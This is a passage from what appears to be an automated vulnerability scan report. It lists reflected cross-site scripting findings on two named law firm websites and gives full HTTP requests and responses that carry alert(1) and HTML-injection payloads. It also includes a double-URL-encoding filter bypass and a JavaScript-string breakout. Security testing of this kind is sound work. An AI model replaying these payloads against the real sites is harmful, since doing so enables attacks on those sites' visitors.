Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/publications/rss.xmld7207"><script>alert(1)</script>5a1738ffeb4" value="">
...[SNIP]...

2.225. http://www.wileyrein.com/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53325%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cfc2555b00 was submitted in the REST URL parameter 1. This input was echoed as 53325"><script>alert(1)</script>5cfc2555b00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /x2253325%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cfc2555b00 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/x2253325"><script>alert(1)</script>5cfc2555b00" value="">
...[SNIP]...

2.226. http://www.wileyrein.com/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b894"><script>alert(1)</script>8dd0074b00e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /x22?4b894"><script>alert(1)</script>8dd0074b00e=1 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/x22?4b894"><script>alert(1)</script>8dd0074b00e" value="1">
...[SNIP]...

2.227. http://www.arnoldporter.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56449"><a>3c0af12941a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.arnoldporter.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=56449"><a>3c0af12941a

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=18264165;expires=Fri, 11-Jan-2041 15:14:59 GMT;path=/
Set-Cookie: CFTOKEN=19385056;expires=Fri, 11-Jan-2041 15:14:59 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=56449"><a>3c0af12941a">
...[SNIP]...

2.228. http://www.arnoldporter.com/about_the_firm_diversity_our_values.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /about_the_firm_diversity_our_values.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a813"><a>7b216e3e1ad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /about_the_firm_diversity_our_values.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=1a813"><a>7b216e3e1ad

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=1a813"><a>7b216e3e1ad">
...[SNIP]...

2.229. http://www.arnoldporter.com/about_the_firm_pro_bono_our_commitment.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /about_the_firm_pro_bono_our_commitment.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7be1"><a>6b37d6049c6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /about_the_firm_pro_bono_our_commitment.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=a7be1"><a>6b37d6049c6

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=a7be1"><a>6b37d6049c6">
...[SNIP]...

2.230. http://www.arnoldporter.com/about_the_firm_recognition.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /about_the_firm_recognition.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18dcd"><a>1951d83601 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /about_the_firm_recognition.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=18dcd"><a>1951d83601

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=18dcd"><a>1951d83601">
...[SNIP]...

2.231. http://www.arnoldporter.com/about_the_firm_recognition_rankings.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /about_the_firm_recognition_rankings.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e576"><a>6afa9807f84 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /about_the_firm_recognition_rankings.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=7e576"><a>6afa9807f84

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=7e576"><a>6afa9807f84">
...[SNIP]...

2.232. http://www.arnoldporter.com/about_the_firm_who_we_are.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /about_the_firm_who_we_are.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d86c8"><a>12209855120 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /about_the_firm_who_we_are.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=d86c8"><a>12209855120

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:26:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=d86c8"><a>12209855120">
...[SNIP]...

2.233. http://www.arnoldporter.com/advisory.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /advisory.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47c51"><a>3e7a64ab71 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /advisory.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=47c51"><a>3e7a64ab71

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Advisory Sign-Up</title>
       <meta name="Description"
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=47c51"><a>3e7a64ab71">
...[SNIP]...

2.234. http://www.arnoldporter.com/careers.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /careers.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f57f0"><a>27be33cf6b9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /careers.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=f57f0"><a>27be33cf6b9

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:26:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=f57f0"><a>27be33cf6b9">
...[SNIP]...

2.235. http://www.arnoldporter.com/contact.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /contact.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5a4c"><a>7d008f3eaa6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /contact.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=f5a4c"><a>7d008f3eaa6

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Contact Us</title>
       <meta name="Description" conte
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=f5a4c"><a>7d008f3eaa6">
...[SNIP]...

2.236. http://www.arnoldporter.com/events.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /events.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e8d2"><a>935e63f487b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /events.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=1e8d2"><a>935e63f487b

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Seminars/Events</title>
       <meta name="Description"
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=1e8d2"><a>935e63f487b">
...[SNIP]...

2.237. http://www.arnoldporter.com/events.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /events.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d1f7'-alert(1)-'2b3427d18c5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /events.cfm?id=670&action=view HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=5d1f7'-alert(1)-'2b3427d18c5

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Natural Resource Damages: The Ground, Groundwater an
...[SNIP]...
d_capture_file).click(function() {
                   $.post("process_user_capture.cfm",
                       { name: name,
                        company: company,
                        email: email,
                        from: 'http://www.google.com/search?hl=en&q=5d1f7'-alert(1)-'2b3427d18c5',
                        document: $(this).attr('id').replace('doc', '')
                        },
                       function(data) {
                        }, "json");
                });
               if (requested_capture_forward == '') {
                   setTimeout('$("#doc" + r
...[SNIP]...

2.238. http://www.arnoldporter.com/experience.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /experience.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 685f0"><a>2390de3ec9b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /experience.cfm?action=case_study HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=685f0"><a>2390de3ec9b

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Experience</title>
       <meta name="Description" conte
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=685f0"><a>2390de3ec9b">
...[SNIP]...

2.239. http://www.arnoldporter.com/global_reach.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /global_reach.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3530c"><a>dd14a6ab469 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /global_reach.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
